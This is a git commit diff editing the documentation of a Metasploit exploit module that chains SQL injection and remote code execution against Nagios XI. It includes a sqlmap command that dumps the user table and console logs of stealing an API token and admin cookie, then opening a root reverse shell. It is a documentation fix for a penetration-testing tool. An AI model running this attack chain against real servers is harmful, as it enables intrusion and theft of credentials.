Update module docs

wvu · wvu · commit b0cd28ef4cbd · 2016-11-30T17:10:57.000-06:00
diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
@@ -30,15 +30,15 @@ anyway.
 
 ## Options
 
-  **USERID**
+  **USER_ID**
 
-  If you wish to exploit a particular UserID, that can be specified here.  Default is 1, which is most likely the admin account.
+  If you wish to exploit a particular ```USER_ID```, that can be specified here.  Default is 1, which is most likely the admin account.
   
-  **APITOKEN**
+  **API_TOKEN**
   
   The SQLi included only works for MySQL, which should work in most cases.  However, if you experience a different backend, you can enumerate the user
-  table via sqlmap: ```sqlmap -u "http://<ip>/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
-  Then you can set the UserID and APITOKEN to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
+  table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
+  Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
 
 ## Usage
 
@@ -95,15 +95,15 @@ msf exploit(nagios_xi_chained_rce) > show options
 
 Module options (exploit/linux/http/nagios_xi_chained_rce):
 
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   APITOKEN                   no        If an API Token was already stolen, skip the sqli
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOST     192.168.2.218    yes       The target address
-   RPORT     80               yes       The target port
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   USERID    1                yes       User ID in the database to target
-   VHOST                      no        HTTP server virtual host
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   API_TOKEN                   no        If an API token was already stolen, skip the SQLi
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      192.168.2.218    yes       The target address
+   RPORT      80               yes       The target port
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   USER_ID    1                yes       User ID in the database to target
+   VHOST                       no        HTTP server virtual host
 
 
 Payload options (cmd/unix/reverse_bash):
@@ -146,22 +146,22 @@ Table: xi_users
 | 2       | admin2               | admin2@admin2.com | 1       | admin2      | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
 +---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
 
-...sip...
+...snip...
 ```
 
 #### Re-target
-Now, we can set the UserID and APIToken (backend_ticket)
+Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket)
 
-```msf exploit(nagios_xi_chained_rce) > set userid 2
-userid => 2
-msf exploit(nagios_xi_chained_rce) > set apitoken 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
-apitoken => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+```
+msf exploit(nagios_xi_chained_rce) > set USER_ID 2
+USER_ID => 2
+msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
 msf exploit(nagios_xi_chained_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.2.117:4444 
 [*] Nagios XI version: 5.2.7
 [*] Getting admin cookie
-[+] 2-tGRcLXmX-e1b4545976adf651e80a15c92200624d
 [+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
 [+] CSRF token: c53d1f591264a3ea771639a7782627f8
 [*] Getting monitored host
@@ -185,32 +185,3 @@ QajRDDToeigHGMFdUbaClxkLfJbxqBKv
 whoami
 root
 ```
-
-#### No APIToken
-Or if the backend is MySQL but we want to target a different user, we can simply just set the userid with no APIToken.
-
-```
-msf exploit(nagios_xi_chained_rce) > set apitoken ''
-apitoken => 
-msf exploit(nagios_xi_chained_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.2.117:4444 
-[*] Nagios XI version: 5.2.7
-[*] Getting API token
-[+] API token: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
-[*] Getting admin cookie
-[+] 2-zIajIKUA-e1b4545976adf651e80a15c92200624d
-[+] Admin cookie: nagiosxi=kjeqq7f074pgn61q8l27togtr3;
-[+] CSRF token: 05ab9c5c27d99e7c13821a3b43d0f5a6
-[*] Getting monitored host
-[+] Monitored host: localhost
-[*] Downloading component
-[*] Uploading root shell
-[*] Popping shell!
-[*] Command shell session 3 opened (192.168.2.117:4444 -> 192.168.2.218:51054) at 2016-10-10 10:17:12 -0400
-[*] Cleaning up...
-[*] rm -rf ../profile
-[*] unzip -qd .. ../../../../tmp/component-profile.zip
-[*] chown -R nagios:nagios ../profile
-[*] rm -f ../../../../tmp/component-xrnIbKdJ.zip
-```
